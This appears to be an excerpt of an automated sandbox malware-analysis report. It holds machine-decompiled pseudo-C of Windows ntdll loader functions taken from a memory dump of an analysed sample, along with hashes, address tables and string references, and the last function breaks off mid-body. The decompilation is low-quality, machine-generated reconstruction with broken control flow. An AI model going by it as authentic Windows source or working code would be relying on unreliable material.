                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                            • API String ID: 3446177414-2283098728
                                                                                                                                                                            • Opcode ID: 0fb01fbd77544a800779d1bd59d8d51fcda55f8086c429399ca9ce5f885f25b1
                                                                                                                                                                            • Instruction ID: d95c024ca6e813f6d7fecb9a1dfd1ca5571cb7abeb408dad5463005cb558d0d1
                                                                                                                                                                            • Opcode Fuzzy Hash: 0fb01fbd77544a800779d1bd59d8d51fcda55f8086c429399ca9ce5f885f25b1
                                                                                                                                                                            • Instruction Fuzzy Hash: 595126756083099FC721EF3DC880B3977A0BB84724F25C62DE5558B2A1E730E840C783
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 54%
                                                                                                                                                                            			E1D85C640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				char _v544;
                                                                                                                                                                            				char _v552;
                                                                                                                                                                            				char _v556;
                                                                                                                                                                            				char* _v560;
                                                                                                                                                                            				short _v562;
                                                                                                                                                                            				signed int _v564;
                                                                                                                                                                            				short _v570;
                                                                                                                                                                            				char _v572;
                                                                                                                                                                            				signed int _v580;
                                                                                                                                                                            				char _v588;
                                                                                                                                                                            				signed int _v604;
                                                                                                                                                                            				signed short _v608;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				void* _t25;
                                                                                                                                                                            				signed int* _t27;
                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                            				signed int _t42;
                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                            				signed char _t56;
                                                                                                                                                                            				signed int* _t58;
                                                                                                                                                                            				intOrPtr* _t65;
                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                            				void* _t70;
                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                            				signed int _t75;
                                                                                                                                                                            				void* _t77;
                                                                                                                                                                            				signed int _t80;
                                                                                                                                                                            				void* _t82;
                                                                                                                                                                            				signed int _t85;
                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                            
                                                                                                                                                                            				_t70 = __edx;
                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                            				_t72 = __ecx;
                                                                                                                                                                            				_t25 = E1D840130();
                                                                                                                                                                            				if(_t25 != 0) {
                                                                                                                                                                            					L1D832330(_t25, 0x1d915b5c);
                                                                                                                                                                            					_t27 =  *0x1d919224; // 0x0
                                                                                                                                                                            					_t75 =  *_t27;
                                                                                                                                                                            					__eflags = _t72;
                                                                                                                                                                            					if(_t72 != 0) {
                                                                                                                                                                            						__eflags = _t75;
                                                                                                                                                                            						if(_t75 == 0) {
                                                                                                                                                                            							goto L13;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t80 = _t75 - 1;
                                                                                                                                                                            							goto L7;
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						__eflags = _t75;
                                                                                                                                                                            						if(_t75 == 0) {
                                                                                                                                                                            							E1D819050( *0x1d91921c, _t75);
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                            						if(_t75 == 0xffffffff) {
                                                                                                                                                                            							L13:
                                                                                                                                                                            							E1D8324D0(0x1d915b5c);
                                                                                                                                                                            							_t65 = 0xe;
                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                            							_t87 = (_t85 & 0xfffffff8) - 0x224;
                                                                                                                                                                            							_v20 =  *0x1d91b370 ^ _t87;
                                                                                                                                                                            							_t76 = _t65;
                                                                                                                                                                            							 *0x1d9191e0( &_v544, 0x104, _t75, _t82);
                                                                                                                                                                            							_t67 =  *_t65() + _t33;
                                                                                                                                                                            							__eflags = _t67;
                                                                                                                                                                            							if(_t67 != 0) {
                                                                                                                                                                            								__eflags =  *0x1d91660c;
                                                                                                                                                                            								_v560 =  &_v552;
                                                                                                                                                                            								_v564 = _t67;
                                                                                                                                                                            								_v562 = 0x208;
                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                            									L25:
                                                                                                                                                                            									_push( &_v556);
                                                                                                                                                                            									_push( &_v564);
                                                                                                                                                                            									E1D8ACB20(0x1d915b5c, _t72, _t76, __eflags);
                                                                                                                                                                            									goto L15;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t76 = ( *0x1d916608 & 0x0000ffff) + 2 + _t67;
                                                                                                                                                                            									_t42 = E1D835D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
                                                                                                                                                                            									_v580 = _t42;
                                                                                                                                                                            									__eflags = _t42;
                                                                                                                                                                            									if(_t42 != 0) {
                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                            										_v570 = _t76;
                                                                                                                                                                            										_v572 = 0;
                                                                                                                                                                            										E1D8410D0(_t67,  &_v572, 0x1d916608);
                                                                                                                                                                            										E1D8410D0(_t67,  &_v580,  &_v572);
                                                                                                                                                                            										E1D82FE40(_t67,  &_v588, ";");
                                                                                                                                                                            										E1D833BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d91660c);
                                                                                                                                                                            										 *0x1d916608 = _v608;
                                                                                                                                                                            										_t54 = _v604;
                                                                                                                                                                            										 *0x1d91660c = _t54;
                                                                                                                                                                            										 *0x1d916604 = _t54;
                                                                                                                                                                            										E1D8AD4A0(_t67, __eflags);
                                                                                                                                                                            										goto L25;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t56 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            										__eflags = _t56 & 0x00000003;
                                                                                                                                                                            										if((_t56 & 0x00000003) != 0) {
                                                                                                                                                                            											_push("Failed to reallocate the system dirs string !\n");
                                                                                                                                                                            											_push(0);
                                                                                                                                                                            											_push("LdrpInitializePerUserWindowsDirectory");
                                                                                                                                                                            											_push(0xcf4);
                                                                                                                                                                            											_push("minkernel\\ntdll\\ldrinit.c");
                                                                                                                                                                            											E1D89E692();
                                                                                                                                                                            											_t56 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            											_t87 = _t87 + 0x14;
                                                                                                                                                                            										}
                                                                                                                                                                            										__eflags = _t56 & 0x00000010;
                                                                                                                                                                            										if((_t56 & 0x00000010) != 0) {
                                                                                                                                                                            											asm("int3");
                                                                                                                                                                            										}
                                                                                                                                                                            										_t39 = 0xc0000017;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								L15:
                                                                                                                                                                            								_t39 = 0;
                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							_pop(_t77);
                                                                                                                                                                            							__eflags = _v36 ^ _t87;
                                                                                                                                                                            							return E1D864B50(_t39, 0x1d915b5c, _v36 ^ _t87, _t70, _t72, _t77);
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t80 = _t75 + 1;
                                                                                                                                                                            							__eflags = _t80;
                                                                                                                                                                            							L7:
                                                                                                                                                                            							_t58 =  *0x1d919224; // 0x0
                                                                                                                                                                            							 *_t58 = _t80;
                                                                                                                                                                            							__eflags = _t72;
                                                                                                                                                                            							if(_t72 != 0) {
                                                                                                                                                                            								__eflags = _t80;
                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                            									E1D819050( *0x1d91921c, 1);
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							_t25 = E1D8324D0(0x1d915b5c);
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					return _t25;
                                                                                                                                                                            				}
                                                                                                                                                                            			}




































                                                                                                                                                                            0x1d85c640
                                                                                                                                                                            0x1d85c642
                                                                                                                                                                            0x1d85c644
                                                                                                                                                                            0x1d85c645
                                                                                                                                                                            0x1d85c647
                                                                                                                                                                            0x1d85c64e
                                                                                                                                                                            0x1d85c65a
                                                                                                                                                                            0x1d85c65f
                                                                                                                                                                            0x1d85c664
                                                                                                                                                                            0x1d85c666
                                                                                                                                                                            0x1d85c668
                                                                                                                                                                            0x1d85c6a4
                                                                                                                                                                            0x1d85c6a6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d85c6a8
                                                                                                                                                                            0x1d85c6a8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d85c6a8
                                                                                                                                                                            0x1d85c66a
                                                                                                                                                                            0x1d85c66a
                                                                                                                                                                            0x1d85c66c
                                                                                                                                                                            0x1d85c675
                                                                                                                                                                            0x1d85c675
                                                                                                                                                                            0x1d85c67a
                                                                                                                                                                            0x1d85c67d
                                                                                                                                                                            0x1d85c6ab
                                                                                                                                                                            0x1d85c6ac
                                                                                                                                                                            0x1d85c6b3
                                                                                                                                                                            0x1d85c6b4
                                                                                                                                                                            0x1d85c6be
                                                                                                                                                                            0x1d85c6cb
                                                                                                                                                                            0x1d85c6dc
                                                                                                                                                                            0x1d85c6df
                                                                                                                                                                            0x1d85c6e9
                                                                                                                                                                            0x1d85c6e9
                                                                                                                                                                            0x1d85c6eb
                                                                                                                                                                            0x1d898090
                                                                                                                                                                            0x1d89809b
                                                                                                                                                                            0x1d8980a4
                                                                                                                                                                            0x1d8980a9
                                                                                                                                                                            0x1d8980ae
                                                                                                                                                                            0x1d89817f
                                                                                                                                                                            0x1d898183
                                                                                                                                                                            0x1d898188
                                                                                                                                                                            0x1d898189
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8980b4
                                                                                                                                                                            0x1d8980c4
                                                                                                                                                                            0x1d8980cc
                                                                                                                                                                            0x1d8980d1
                                                                                                                                                                            0x1d8980d5
                                                                                                                                                                            0x1d8980d7
                                                                                                                                                                            0x1d898114
                                                                                                                                                                            0x1d898116
                                                                                                                                                                            0x1d89811b
                                                                                                                                                                            0x1d89812a
                                                                                                                                                                            0x1d898139
                                                                                                                                                                            0x1d898148
                                                                                                                                                                            0x1d89815e
                                                                                                                                                                            0x1d898167
                                                                                                                                                                            0x1d89816c
                                                                                                                                                                            0x1d898170
                                                                                                                                                                            0x1d898175
                                                                                                                                                                            0x1d89817a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8980d9
                                                                                                                                                                            0x1d8980d9
                                                                                                                                                                            0x1d8980de
                                                                                                                                                                            0x1d8980e0
                                                                                                                                                                            0x1d8980e2
                                                                                                                                                                            0x1d8980e7
                                                                                                                                                                            0x1d8980e9
                                                                                                                                                                            0x1d8980ee
                                                                                                                                                                            0x1d8980f3
                                                                                                                                                                            0x1d8980f8
                                                                                                                                                                            0x1d8980fd
                                                                                                                                                                            0x1d898102
                                                                                                                                                                            0x1d898102
                                                                                                                                                                            0x1d898105
                                                                                                                                                                            0x1d898107
                                                                                                                                                                            0x1d898109
                                                                                                                                                                            0x1d898109
                                                                                                                                                                            0x1d89810a
                                                                                                                                                                            0x1d89810a
                                                                                                                                                                            0x1d8980d7
                                                                                                                                                                            0x1d85c6f1
                                                                                                                                                                            0x1d85c6f1
                                                                                                                                                                            0x1d85c6f1
                                                                                                                                                                            0x1d85c6f1
                                                                                                                                                                            0x1d85c6f1
                                                                                                                                                                            0x1d85c6fa
                                                                                                                                                                            0x1d85c6fb
                                                                                                                                                                            0x1d85c705
                                                                                                                                                                            0x1d85c67f
                                                                                                                                                                            0x1d85c67f
                                                                                                                                                                            0x1d85c67f
                                                                                                                                                                            0x1d85c680
                                                                                                                                                                            0x1d85c680
                                                                                                                                                                            0x1d85c685
                                                                                                                                                                            0x1d85c687
                                                                                                                                                                            0x1d85c689
                                                                                                                                                                            0x1d85c68b
                                                                                                                                                                            0x1d85c68d
                                                                                                                                                                            0x1d85c697
                                                                                                                                                                            0x1d85c697
                                                                                                                                                                            0x1d85c68d
                                                                                                                                                                            0x1d85c69d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d85c69d
                                                                                                                                                                            0x1d85c67d
                                                                                                                                                                            0x1d85c650
                                                                                                                                                                            0x1d85c650
                                                                                                                                                                            0x1d85c653
                                                                                                                                                                            0x1d85c653

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 1D8980E9
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1D8980F3
                                                                                                                                                                            • Failed to reallocate the system dirs string !, xrefs: 1D8980E2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 3446177414-1783798831
                                                                                                                                                                            • Opcode ID: a2b972f3b5a98914aecefeb1ce094f9d2c1c7d02d7ce6d225e316f4d1c87f82f
                                                                                                                                                                            • Instruction ID: ac812b828e43161b7bfec65b28376204c19fe0190d70e2df4ea88a4e73d60d9d
                                                                                                                                                                            • Opcode Fuzzy Hash: a2b972f3b5a98914aecefeb1ce094f9d2c1c7d02d7ce6d225e316f4d1c87f82f
                                                                                                                                                                            • Instruction Fuzzy Hash: 0A41B475518315ABC711DF68DC80B5B77F8AF846A0F024A2EF96897261E774E900CB93
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                            			E1D8A43D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				char _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				signed char _t37;
                                                                                                                                                                            				signed int _t41;
                                                                                                                                                                            				intOrPtr _t44;
                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                            				void* _t54;
                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                            				signed int _t60;
                                                                                                                                                                            				signed int _t64;
                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                            				intOrPtr _t70;
                                                                                                                                                                            
                                                                                                                                                                            				_t68 = _a4;
                                                                                                                                                                            				_t54 = __edx;
                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                            				_v24 = E1D8A4B46(_t68);
                                                                                                                                                                            				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
                                                                                                                                                                            				_v8 =  *((intOrPtr*)(_t54 + 0x30));
                                                                                                                                                                            				_v20 =  *((intOrPtr*)(_t54 + 0x90));
                                                                                                                                                                            				_t37 =  *0x1d916714; // 0x0
                                                                                                                                                                            				_v16 = _t68;
                                                                                                                                                                            				_t69 =  *0x1d916710; // 0x0
                                                                                                                                                                            				if((_t37 & 0x00000001) != 0) {
                                                                                                                                                                            					if(_t69 == 0) {
                                                                                                                                                                            						_t69 = 0;
                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t69 = _t69 ^ 0x1d916710;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				_t64 = _t37 & 1;
                                                                                                                                                                            				while(_t69 != 0) {
                                                                                                                                                                            					__eflags = E1D8A4528(_t54, _t69,  &_v24, _t69);
                                                                                                                                                                            					if(__eflags >= 0) {
                                                                                                                                                                            						if(__eflags <= 0) {
                                                                                                                                                                            							L25:
                                                                                                                                                                            							while(_t69 != 0) {
                                                                                                                                                                            								_t41 = E1D8A4528(_t54, _t69,  &_v24, _t69);
                                                                                                                                                                            								__eflags = _t41;
                                                                                                                                                                            								if(_t41 != 0) {
                                                                                                                                                                            									break;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t66 =  *0x1d915ca0; // 0x0
                                                                                                                                                                            								__eflags = _t66;
                                                                                                                                                                            								if(_t66 == 0) {
                                                                                                                                                                            									L28:
                                                                                                                                                                            									__eflags =  *0x1d9137c0 & 0x00000005;
                                                                                                                                                                            									_t70 =  *((intOrPtr*)(_t69 + 0x20));
                                                                                                                                                                            									if(( *0x1d9137c0 & 0x00000005) != 0) {
                                                                                                                                                                            										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                                                                                                                            										_push( *((intOrPtr*)(_t44 + 0x2a8)));
                                                                                                                                                                            										_push( *((intOrPtr*)(_t44 + 0x2a4)));
                                                                                                                                                                            										_push(_a4);
                                                                                                                                                                            										_push( *((intOrPtr*)(_t54 + 0x30)));
                                                                                                                                                                            										_push( *((intOrPtr*)(_t54 + 0x2c)));
                                                                                                                                                                            										_push( *((intOrPtr*)(_v28 + 0x30)));
                                                                                                                                                                            										E1D89E692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
                                                                                                                                                                            									}
                                                                                                                                                                            									L27:
                                                                                                                                                                            									return _t70;
                                                                                                                                                                            								}
                                                                                                                                                                            								 *0x1d9191e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
                                                                                                                                                                            								_t49 =  *_t66();
                                                                                                                                                                            								__eflags = _t49;
                                                                                                                                                                            								if(_t49 != 0) {
                                                                                                                                                                            									goto L28;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t50 =  *(_t69 + 4);
                                                                                                                                                                            								_t59 = _t69;
                                                                                                                                                                            								__eflags = _t50;
                                                                                                                                                                            								if(_t50 == 0) {
                                                                                                                                                                            									while(1) {
                                                                                                                                                                            										_t69 =  *(_t69 + 8) & 0xfffffffc;
                                                                                                                                                                            										__eflags = _t69;
                                                                                                                                                                            										if(_t69 == 0) {
                                                                                                                                                                            											goto L25;
                                                                                                                                                                            										}
                                                                                                                                                                            										__eflags =  *_t69 - _t59;
                                                                                                                                                                            										if( *_t69 == _t59) {
                                                                                                                                                                            											goto L25;
                                                                                                                                                                            										}
                                                                                                                                                                            										_t59 = _t69;
                                                                                                                                                                            									}
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t69 = _t50;
                                                                                                                                                                            								_t60 =  *_t69;
                                                                                                                                                                            								__eflags = _t60;
                                                                                                                                                                            								if(_t60 == 0) {
                                                                                                                                                                            									continue;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L20;
                                                                                                                                                                            								}
                                                                                                                                                                            								do {
                                                                                                                                                                            									L20:
                                                                                                                                                                            									_t51 =  *_t60;
                                                                                                                                                                            									_t69 = _t60;
                                                                                                                                                                            									_t60 = _t51;
                                                                                                                                                                            									__eflags = _t51;
                                                                                                                                                                            								} while (_t51 != 0);
                                                                                                                                                                            							}
                                                                                                                                                                            							_t70 = 0xffbadd11;
                                                                                                                                                                            							goto L27;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t52 =  *(_t69 + 4);
                                                                                                                                                                            						L9:
                                                                                                                                                                            						__eflags = _t64;
                                                                                                                                                                            						if(_t64 == 0) {
                                                                                                                                                                            							L12:
                                                                                                                                                                            							_t69 = _t52;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t52;
                                                                                                                                                                            						if(_t52 == 0) {
                                                                                                                                                                            							goto L12;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t69 = _t69 ^ _t52;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t52 =  *_t69;
                                                                                                                                                                            					goto L9;
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L25;
                                                                                                                                                                            			}


























                                                                                                                                                                            0x1d8a43e2
                                                                                                                                                                            0x1d8a43e5
                                                                                                                                                                            0x1d8a43e7
                                                                                                                                                                            0x1d8a43f3
                                                                                                                                                                            0x1d8a43fa
                                                                                                                                                                            0x1d8a4401
                                                                                                                                                                            0x1d8a440b
                                                                                                                                                                            0x1d8a440f
                                                                                                                                                                            0x1d8a4414
                                                                                                                                                                            0x1d8a4418
                                                                                                                                                                            0x1d8a4420
                                                                                                                                                                            0x1d8a4424
                                                                                                                                                                            0x1d8a442e
                                                                                                                                                                            0x1d8a442e
                                                                                                                                                                            0x1d8a4426
                                                                                                                                                                            0x1d8a4426
                                                                                                                                                                            0x1d8a4426
                                                                                                                                                                            0x1d8a4424
                                                                                                                                                                            0x1d8a4433
                                                                                                                                                                            0x1d8a445e
                                                                                                                                                                            0x1d8a4443
                                                                                                                                                                            0x1d8a4445
                                                                                                                                                                            0x1d8a444b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8a44c0
                                                                                                                                                                            0x1d8a446a
                                                                                                                                                                            0x1d8a446f
                                                                                                                                                                            0x1d8a4471
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8a4473
                                                                                                                                                                            0x1d8a4479
                                                                                                                                                                            0x1d8a447b
                                                                                                                                                                            0x1d8a44d4
                                                                                                                                                                            0x1d8a44d4
                                                                                                                                                                            0x1d8a44db
                                                                                                                                                                            0x1d8a44de
                                                                                                                                                                            0x1d8a44e6
                                                                                                                                                                            0x1d8a44e9
                                                                                                                                                                            0x1d8a44ef
                                                                                                                                                                            0x1d8a44f9
                                                                                                                                                                            0x1d8a44fc
                                                                                                                                                                            0x1d8a44ff
                                                                                                                                                                            0x1d8a4502
                                                                                                                                                                            0x1d8a451e
                                                                                                                                                                            0x1d8a4523
                                                                                                                                                                            0x1d8a44c9
                                                                                                                                                                            0x1d8a44d1
                                                                                                                                                                            0x1d8a44d1
                                                                                                                                                                            0x1d8a4489
                                                                                                                                                                            0x1d8a448f
                                                                                                                                                                            0x1d8a4491
                                                                                                                                                                            0x1d8a4493
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8a4495
                                                                                                                                                                            0x1d8a4498
                                                                                                                                                                            0x1d8a449a
                                                                                                                                                                            0x1d8a449c
                                                                                                                                                                            0x1d8a44b8
                                                                                                                                                                            0x1d8a44bb
                                                                                                                                                                            0x1d8a44bb
                                                                                                                                                                            0x1d8a44be
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8a44b2
                                                                                                                                                                            0x1d8a44b4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8a44b6
                                                                                                                                                                            0x1d8a44b6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8a44b8
                                                                                                                                                                            0x1d8a449e
                                                                                                                                                                            0x1d8a44a0
                                                                                                                                                                            0x1d8a44a2
                                                                                                                                                                            0x1d8a44a4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8a44a6
                                                                                                                                                                            0x1d8a44a6
                                                                                                                                                                            0x1d8a44a6
                                                                                                                                                                            0x1d8a44a8
                                                                                                                                                                            0x1d8a44aa
                                                                                                                                                                            0x1d8a44ac
                                                                                                                                                                            0x1d8a44ac
                                                                                                                                                                            0x1d8a44b0
                                                                                                                                                                            0x1d8a44c4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8a44c4
                                                                                                                                                                            0x1d8a444d
                                                                                                                                                                            0x1d8a4450
                                                                                                                                                                            0x1d8a4450
                                                                                                                                                                            0x1d8a4452
                                                                                                                                                                            0x1d8a445c
                                                                                                                                                                            0x1d8a445c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8a445c
                                                                                                                                                                            0x1d8a4454
                                                                                                                                                                            0x1d8a4456
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8a4458
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8a4458
                                                                                                                                                                            0x1d8a4447
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8a4447
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 1D8A4519
                                                                                                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1D8A4508
                                                                                                                                                                            • LdrpCheckRedirection, xrefs: 1D8A450F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                            • API String ID: 3446177414-3154609507
                                                                                                                                                                            • Opcode ID: 04c0d0f419a1ec2f212da0294af7cd514b7e566b6eb93002b160ca6ae1c4d1b2
                                                                                                                                                                            • Instruction ID: 975d9fc6a87be129a033063eb167e3d5743f705f749aaced1ec955b4e867cb11
                                                                                                                                                                            • Opcode Fuzzy Hash: 04c0d0f419a1ec2f212da0294af7cd514b7e566b6eb93002b160ca6ae1c4d1b2
                                                                                                                                                                            • Instruction Fuzzy Hash: 28416F3260B6129BCF11CF6C8940E667BE5BF48A60F16465AFD9C97255D731E800CB93
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3446177414-0
                                                                                                                                                                            • Opcode ID: 639d6a38a103fbb2970907983246a6df3d0423dfed738970aa22172fcb8a94de
                                                                                                                                                                            • Instruction ID: c27c5b5f1d3e91c0140a1bcaa389534e9d785fbe38f790c35e97254967a1dfd5
                                                                                                                                                                            • Opcode Fuzzy Hash: 639d6a38a103fbb2970907983246a6df3d0423dfed738970aa22172fcb8a94de
                                                                                                                                                                            • Instruction Fuzzy Hash: 58515934704616DFDB09CF18D890A2AB7E1FB89760B12816DE91ADB710DB71EC81CB82
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 29%
                                                                                                                                                                            			E1D857A4F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                            				void* _t50;
                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                            				intOrPtr* _t69;
                                                                                                                                                                            				void* _t73;
                                                                                                                                                                            
                                                                                                                                                                            				_t63 = __edx;
                                                                                                                                                                            				_t51 = __ebx;
                                                                                                                                                                            				_push(0x30);
                                                                                                                                                                            				_push(0x1d8fc840);
                                                                                                                                                                            				E1D877BE4(__ebx, __edi, __esi);
                                                                                                                                                                            				_t66 = __ecx;
                                                                                                                                                                            				 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
